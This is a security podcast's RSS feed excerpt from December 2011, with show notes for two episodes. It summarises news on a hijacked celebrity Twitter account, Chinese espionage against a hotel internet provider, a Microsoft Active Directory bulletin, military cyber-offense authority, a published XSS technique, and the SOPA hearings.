	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">After a number of redirects, the link ultimately leads to a survey scam that is designed to harvest personal information:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The first link uses the URL shortener bit.ly, which has suspended the link as &quot;being potentially problematic.&quot; Although this should keep most users away from the scam for now, the attackers are likely to post new tweets that include phishing or malicious URLs as long as they have control of the account. The Twitter community has responded by sharing the fact that Lady Gaga&#39;s account shouldn&#39;t be trusted. This led to #stophackinggaga as a trending Twitter topic at the time this post was written. As always, be careful of links you click on Twitter, even when they appear to come from trusted accounts.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://seattletimes.nwsource.com/html/businesstechnology/2017026763_chinacyberwar18.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://seattletimes.nwsource.com/html/businesstechnology/2017026763_chinacyberwar18.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google and Intel were logical targets for China-based hackers, given the solid-gold intellectual property data stored in their computers. An attack by cyberspies on iBahn, a provider of Internet services to hotels, takes some explaining.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">iBahn provides broadband business and entertainment access to guests of Marriott International and other hotel chains, including multinational companies that hold meetings on site. Breaking into iBahn&#39;s networks, according to a senior U.S. intelligence official familiar with the matter, may have let hackers see millions of confidential emails, even encrypted ones, as executives from Dubai to New York reported back on everything from new-product development to merger negotiations.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">More worrisome, hackers might have used iBahn&#39;s system as a launchpad into corporate networks that are connected to it, using traveling employees to create a backdoor to company secrets, said Nick Percoco, head of Trustwave&#39;s SpiderLabs, a security firm.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The hackers&#39; interest in companies as small as Salt Lake City-based iBahn illustrates the breadth of China&#39;s spying against firms in the U.S. and elsewhere.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The networks of at least 760 companies, research universities, Internet service providers and government agencies were hit over the last decade by the same group of China-based cyberspies.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The companies, including firms such as Research in Motion and Boston Scientific, range from some of the largest corporations to niche innovators in sectors like aerospace, semiconductors, pharmaceuticals and biotechnology, according to intelligence data obtained by Bloomberg News.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;They are stealing everything that isn&#39;t bolted down, and it&#39;s getting exponentially worse,&quot; said U.S. Rep. Mike Rogers, a Michigan Republican who is chairman of the Permanent Select Committee on Intelligence.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">China has made industrial espionage an integral part of its economic policy, stealing company secrets to help it leapfrog over U.S. and other foreign competitors to further its goal of becoming the world&#39;s largest economy, U.S. intelligence officials have concluded in a report released last month.</span><br />
	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-549-sopa-manning-iowa-lady-gaga-china/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3287/0/infosec-daily-podcast-episode-549.mp3" length="21495158" type="audio/mpeg" />
		<itunes:duration>0:44:44</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 549 for December 19, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Beau Woods, Karthik Rangarajan, Geordy Rostad, and Varun Sharma.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know an[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 549 for December 19, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Beau Woods, Karthik Rangarajan, Geordy Rostad, and Varun Sharma.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: http://www.globalpost.com/dispatch/news/regions/americas/united-states/111216/anonymous-hackers-sopa-vote-congress
	In response to a bill now before Congress, which opponents say would dramatically erode Internet freedom, the free and fair use of copyrighted material and online privacy, hacker groups have begun to publicly threaten to launch attacks on US government workers and websites.
	The US House Judiciary Committee debated for a second day on Friday the Stop Online Piracy Act (SOPA), a bill that would bestow the US Department of Justice and individual copyright holders with unprecedented powers to shut down websites and crack down on users for what they deem to be violations of copyrights.
	The vote was postponed after day two of the debate after a wayward tweet derailed talks on Thursday. Rep. Steve King (R &#8211; Iowa) tweeted that Rep. Sheila Jackson Lee (D &#8211; TX) was &#8220;boring.&#8221; The hearing then grinded to a halt after Jackson Lee took issue with the offensive comment. The hearing fell behind schedule and the vote was delayed until Dec. 21.
	The delay will give the bill&#8217;s detractors more time to organize its calls for the bill to be dropped. The bill as it now stands appears to have enough votes to pass the House of Representatives and move on to the Senate.
	&#8230;.
	Anonymous hackers are lining up to take down the US government if SOPA passes. &#160;From the picture, it looks like must be lining up at the Apple store&#8230;
	&#8230;.
	Source: http://www.usatoday.com/news/military/story/2011-12-19/manning-wikileaks-hearing/52074010/1
	Computer forensics investigators testified Monday that the computer of a soldier accused of sharing military secrets contained thousands of sensitive files and logs of conversations between himself and a former hacker who turned him in.
	Investigators said they found evidence [...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 548 &#8211; MS11-095, Offensive Strikes, Automated Bank Robbery &amp; SOPA STOPPA</title>
		<link>http://www.isdpodcast.com/episode-548-ms11-095-offensive-strikes-automated-bank-robbery-sopa-stoppa</link>
		<comments>http://www.isdpodcast.com/episode-548-ms11-095-offensive-strikes-automated-bank-robbery-sopa-stoppa#comments</comments>
		<pubDate>Sat, 17 Dec 2011 01:49:43 +0000</pubDate>
		<dc:creator>Karthik.Rangarajan</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3284</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 548 for December 16, 2011. &#160;Tonight&#39;s podcast is hosted by Karthik Rangarajan, Boris Sverdlik, Geordy Rostad, and Themson Mester. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a [...]]]></description>
			<content:encoded><![CDATA[<p><span id="internal-source-marker_0.2792403629824465" style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 548 for December 16, 2011. &nbsp;Tonight&#39;s podcast is hosted by Karthik Rangarajan, Boris Sverdlik, Geordy Rostad, and Themson Mester.</span></p>
<p>	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="https://technet.microsoft.com/en-us/security/bulletin/ms11-095"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://technet.microsoft.com/en-us/security/bulletin/ms11-095</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This security update resolves a privately reported vulnerability in Active Directory, Active Directory Application Mode (ADAM), and Active Directory Lightweight Directory Service (AD LDS). The vulnerability could allow remote code execution if an attacker logs on to an Active Directory domain and runs a specially crafted application. To exploit this vulnerability, an attacker would first need to acquire credentials to log on to an Active Directory domain.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This security update is rated Important for Active Directory, ADAM, and AD LDS when installed on supported editions of Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008 (except Itanium), Windows 7, and Windows Server 2008 R2 (except Itanium). For more information, see the subsection, Affected and Non-Affected Software, in this section.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The security update addresses the vulnerability by changing the way that Active Directory, Active Directory Application Mode (ADAM), and Active Directory Lightweight Directory Service (AD LDS) handle objects in memory. For more information about the vulnerability, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">:</span><a href="http://www.wired.com/threatlevel/2011/12/internet-war-2/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.wired.com/threatlevel/2011/12/internet-war-2/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The House and Senate agreed to give the U.S. military the power to conduct &ldquo;offensive&rdquo; strikes online &mdash; including clandestine attacks, via a little-noticed provision in the military&rsquo;s 2012 funding bill.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The power, which was included in the House version but not the Senate version, was included in the final &ldquo;reconciled&rdquo; bill that is all but guaranteed to pass into law.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Congress affirms that the Department of Defense has the capability, and upon direction by the President may conduct offensive operations in cyberspace to defend our Nation, Allies and interests, subject to&ndash; (1) the policy principles and legal regimes that the Department follows for kinetic capabilities, including the law of armed conflict; and (2) the War Powers Resolution (50 U.S.C. 1541 et seq.).</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">While &ldquo;offensive&rdquo; action isn&rsquo;t defined, that&rsquo;s likely to include things like unleashing a worm like the Stuxnet worm that damaged Iran&rsquo;s nuclear centrifuges, hacking into another country&rsquo;s power grid to bring it down, disabling websites via denial-of-service attacks, or as the CIA has already done with some collateral damage, hacking into a forum where would-be terrorists meet in order to permanently disable it.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&#8230;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.theregister.co.uk/2011/12/16/potent_xss_script/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2011/12/16/potent_xss_script/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A hacker has published code for potent cross-site scripting attacks that he claims go beyond the usual cookie stealing and phishing for users&#39; private details.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cross-site scripting (XSS) flaws allow attackers to present content under their control in the context of a vulnerable yet trusted site, thus tricking marks into handing sensitive information to miscreants. As well as creating a means to present pop-ups that link to a hacker-controlled site, XSSes can also lead to cookie theft.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Niklas Femerstrand is the hacker who in October 2011 discovered that a debugging tool on the American Express website was</span><a href="http://www.theregister.co.uk/2011/10/07/amex_website_security_snafu/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">vulnerable to an XSS flaw</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. He developed an &quot;XSS on steroids&quot; script while researching a similar flaw on the website of an unnamed Swedish bank.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;There are common myths about XSSes saying they can only be be used for phishing and cookie harvesting,&quot; he said. &quot;My code bursts those myths and is so the first way of transforming a &#39;non persistent&#39; XSS into a persistent state.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;I have written self-aware code that recognizes its own presence and makes a local infection of its own payload into all links of a website presented to the infected visitor. This way the non-persistent XSS becomes persistent to the infected user. It also follows the user through page forms and sends interesting data to the attacker (usernames, passwords, credit card info),&quot; he added.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Femerstrand last week published his attack code on his website</span><a href="http://qnrq.se/eliminating-the-myths-of-xss-attacks"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">here</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.wired.com/threatlevel/2011/12/sopa-vote-delayed/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.wired.com/threatlevel/2011/12/sopa-vote-delayed/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The House Judiciary Committee considering whether to send the Stop Online Piracy Act to the House floor abruptly adjourned Friday with no new vote date set &mdash; a surprise given that the bill looked certain to pass out of committee.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The committee&rsquo;s chairman and chief sponsor of the legislation, Rep. Lamar Smith (R-Texas), agreed to further explore a controversial provision that lets the Attorney General order changes to core internet infrastructure in order to stop copyright infringement.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Smith said the hearing would resume at the &ldquo;earliest practical day that Congress is in session.&rdquo; Hours later, &nbsp;Rep. Darrell Issa (R-California) tweeted that the committee would resume action Wednesday.</span></p>
